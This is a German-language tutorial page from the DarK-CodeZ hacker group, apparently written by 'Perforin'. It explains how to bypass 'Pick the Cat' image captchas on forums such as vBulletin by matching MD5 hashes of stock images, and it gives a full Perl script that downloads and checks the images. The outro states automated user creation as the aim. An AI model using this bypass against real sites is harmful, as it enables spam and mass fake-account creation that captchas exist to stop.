<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content=
"HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii" />
<title>Pick the Cat Captcha breaking</title>
<link rel="stylesheet" href="../../css/code.css" type="text/css" />
</head>
<body>
<hr />
<pre>
<b>[+]</b><u>Topic: Paper</u>
<b>[+]</b><u>Von: Perforin</u>
<b>[+]</b><u>Return: <a href=
"javascript:history.back()">Paper</a></u>
</pre>
<hr />
<pre>
DaRk-CoDeZDaRk-CoDeZDaRk-CoDeZDaRk-CoDeZ
DaRk-                              DaRk-  
CoDeZ     Pick the Cat Captcha     CoDeZ        Trust my Technolust! :)
DaRk-          breaking            DaRk-        
CoDeZ        by Perforin           CoDeZ         www.vx.perforin.de.vu
DaRk-                              DaRk-          www.DarK-CodeZ.com
DaRk-CoDeZDaRk-CoDeZDaRk-CoDeZDaRk-CoDeZ


&lt;1&gt; ______Intro______

Ja, hallo und willkommen in meinem Tutorial wie man sogenannte "Pick the Cat" Captchas umgehen kann.
Das beste daran ist, wir kommen ganz ohne OCR Software aus =)

Also, was werdet ihr nun hier erfahren?
Hier bekommt ihr die Anleitung wie man sowas umgehen kann und dazu gebe ich noch ein Beispiel Code ab.
Jedoch ist dieser Code nur genau auf meine Testseite "http://tinyurl.com/67pfxo" zugeschnitten!
Erwartet nicht dass ihr hier einen funktionsf&auml;higen Code findet um z.B vbulletin Boards zu spammen.


&lt;2&gt; ______How_to______

Wie oben schon gesagt kommen wir ganz ohne OCR Software aus.Die ganze Idee hinter dieser Methode ist einfach
die, dass wir die Bilder die zur Auswahl stehen herunterladen, sie anschliessend per Checksumme zu &uuml;berpr&uuml;fen
und dann mit einer kleinen Datenbank abzugleichen. Dies ist sogar sehr effektiv da die meisten Board Betreiber
nur die standart Bilder nehmen die man zum Beispiel bei vbulletin sofort dazu bekommt.Um unsere Datenbank nun 
aufzubauen m&uuml;ssen wir f&uuml;r jedes dieser Bilder, die Checksumme berechnen und diese speichern.
Etwa in diesem Format:

Katze:d27f8307d4548653d85b983d11ed3c27
Hund:f9446816127cb98667e7b97f0e362dd1
Fisch:1acf2d3261faaa95b21301fecbc379d4

Wenn dieser Schritt gemacht wurde, m&uuml;ssen wir uns noch ein Skript/Prog schreiben dass auf unser gew&uuml;nschtes Ziel
connected und dann:

- Herrausfindet, welches Bild ausgew&auml;hlt werden soll (Katze,Hund,Fisch etc).
- Die angezeigten Bilder herunterl&auml;d, die Checksumme pr&uuml;ft und sie mit unserer Datenbank vergleicht.

Haben wir unsere ben&ouml;tigten Informationen k&ouml;nnen wir nun dem gew&uuml;nschtem Link folgen und haben somit die Barriere
des "Pick the Cat" - Captcha &uuml;berwunden.Dies kann man mit der simplem POST Methode machen.


&lt;3&gt; ______Beispiel_Code______

Ich hab hier einen Beispiel Code in Perl, der wie auch schon oben erw&auml;hnt wurde, nur speziell an meine Testseite
angepasst wurde!

-------------------------------------------------------------------------&gt;8

#!/usr/bin/perl
# Pick the Cat - Captcha Breaker by Perforin

use IO::Socket::INET;
use Digest::MD5 qw(md5 md5_hex md5_base64);

($Target,$Path) = @ARGV;
($cat,$dog,$fish) = ("d27f8307d4548653d85b983d11ed3c27","f9446816127cb98667e7b97f0e362dd1","1acf2d3261faaa95b21301fecbc379d4");

if (length($Target) eq 0) {
print &lt;&lt;"HLP";
--------------------------------
captcha_breaker.pl URL PATH
--------------------------------
HLP
exit;
}

print &lt;&lt;"STG1";
--------------------------------
"Pick the cat" - Captcha Breaker
--------------------------------

STG1
$sock = new IO::Socket::INET(PeerAddr =&gt; "$Target",
                                PeerPort =&gt; 80,
                                Proto =&gt; 'tcp',
                                Timeout =&gt; 2) || die "[-] Connection refused!\n";
                                
print "[+] Connected\n";

print $sock "GET $Path HTTP/1.1\r\n";
print $sock "Host: $Target\r\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\r\n";
print $sock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
print $sock "Connection: close\n";
print $sock "\r\n\r\n";

print "[+] Sending request\n";

open(TMP,"&gt;","t3mp.tmp");
while(&lt;$sock&gt;) {
$_ =~ tr/"/\n/;
print TMP $_;
}
close(TMP);

open(TMP,"&lt;","t3mp.tmp");
while () {
if (m/\w+\.png/) { push(@Images_crawl,"$&amp;"); }
}
close(TMP);

print "[+] Image links received\n";

                                
foreach $Image (@Images_crawl) {
$counter++;

$sock1 = new IO::Socket::INET(PeerAddr =&gt; "$Target",
                                PeerPort =&gt; 80,
                                Proto =&gt; 'tcp',
                                Timeout =&gt; 2) || die "[-] Connection refused!\n";
                                
print $sock1 "GET $Path$Image HTTP/1.1\r\n";
print $sock1 "Host: $Target\r\n";
print $sock1 "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\r\n";
print $sock1 "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
print $sock1 "Connection: close\n";
print $sock1 "\r\n\r\n";
binmode($sock1);
print "[+] Downloading Image $counter\n";

open(IMG,"&gt;","$Image");
binmode(IMG);
while(&lt;$sock1&gt;) {
if (m/^HTTP\/1.1/) {
$_ =~ s/$_//;
} elsif (m/^Date:/) {
$_ =~ s/$_//;
} elsif (m/^Server:/) {
$_ =~ s/$_//;
} elsif (m/^Last-Modified:/) {
$_ =~ s/$_//;
} elsif (m/^ETag:/) {
$_ =~ s/$_//;
} elsif (m/^Accept-Ranges:/) {
$_ =~ s/$_//;
} elsif (m/^Content-Length:/) {
$_ =~ s/$_//;
} elsif (m/^Connection:/) {
$_ =~ s/$_//;
} elsif (m/^Content-Type:/) {
$_ =~ s/$_//;
} elsif (m/^\s\n/) {
$_ =~ s/$_//;
} else {
print IMG $_;
}
}
close(IMG);
}

$sock2 = new IO::Socket::INET(PeerAddr =&gt; "$Target",
                                PeerPort =&gt; 80,
                                Proto =&gt; 'tcp',
                                Timeout =&gt; 2) || die "[-] Connection refused!\n";
                                
print $sock2 "GET $Path HTTP/1.1\r\n";
print $sock2 "Host: $Target\r\n";
print $sock2 "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\r\n";
print $sock2 "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
print $sock2 "Connection: keep-alive\n";
print $sock2 "\r\n\r\n";

while(&lt;$sock2&gt;) {
if (m/^Please pick the/i) {
if (m/cat/i) {
$fWORD = "cat";
} elsif (m/dog/i) {
$fWORD = "dog";
} elsif (m/fish/i) {
$fWORD = "fish";
} else {
print "[-] Could not read the word!\n";
exit;
}
print "[+] Image to click: $fWORD\n";
}
}

foreach $picture (@Images_crawl) {
open(TMP,"&lt;","$picture") || die "[-] Something went wrong!";
binmode(TMP);
if ($fWORD =~ m/cat/) {
$digest = Digest::MD5-&gt;new-&gt;addfile(*TMP)-&gt;hexdigest;
if ($digest =~ $cat) {
print "[+] Captcha cracked: First picture to click!\n";
exit;
}
} elsif ($fWORD =~ m/dog/) {
$digest = Digest::MD5-&gt;new-&gt;addfile(*TMP)-&gt;hexdigest;
if ($digest =~ $dog) {
print "[+] Captcha cracked: Second picture to click!\n";
exit;
}
} elsif ($fWORD =~ m/fish/) {
$digest = Digest::MD5-&gt;new-&gt;addfile(*TMP)-&gt;hexdigest;
if ($digest =~ $fish) {
print "[+] Captcha cracked: Third picture to click!\n";
exit;
}
} else {
print "[-] Could not crack the Captcha!\n";
exit;
}
close(TMP);
}

-------------------------------------------------------------------------&gt;8

Dazu sollte man noch folgendes wissen:

- Bei meiner Testseite befinden sich die Bilder immer an der selben Position, dass dies aber bei vielen Seiten
anders ist, sollte bekannt sein!
- Ich sende wenn das Captcha gecrackt wurde, anschliessend nichts per POST an den Server, da das Captcha dort auch
nicht wirklich einen Sinn hat, und eben nur f&uuml;rs Vorf&uuml;hren gedacht ist.
- Perl rockt.


&lt;4&gt; ______Outro______

Hier nochmal in Kurzform was zu tun ist:

1) Datenbank anlegen
2) Skript/Prog schreiben das die ben&ouml;tigten Infos ausliest und die Bilder herunterl&auml;d
3) Die Checksumme dieser einzelnen Bilder werden mit unserer Datenbank verglichen
4) Skript/Prog sendet per POST unsere gesammelten Daten an den Server damit wir somit z.B einen User anlegen k&ouml;nnen.

Ich hoffe ich konnte euch somit helfen oder euch nen Denkanstoss verpassen ;)
Wer fragen diesbez&uuml;glich hat, kann mir gerne eine Mail an perforin[&auml;t]hackermail[d0t]com senden!
Gr&uuml;sse an:
SkyOut von Wired-Security, sowie an Sph1nX, Neo2k8, ringwrath-4, thejanky und den ganzen Rest von DarK-CodeZ sowie
nat&uuml;rlich an alle VX&acute;er und die die mich kennen.
</b>
</pre>
</body>
</html>
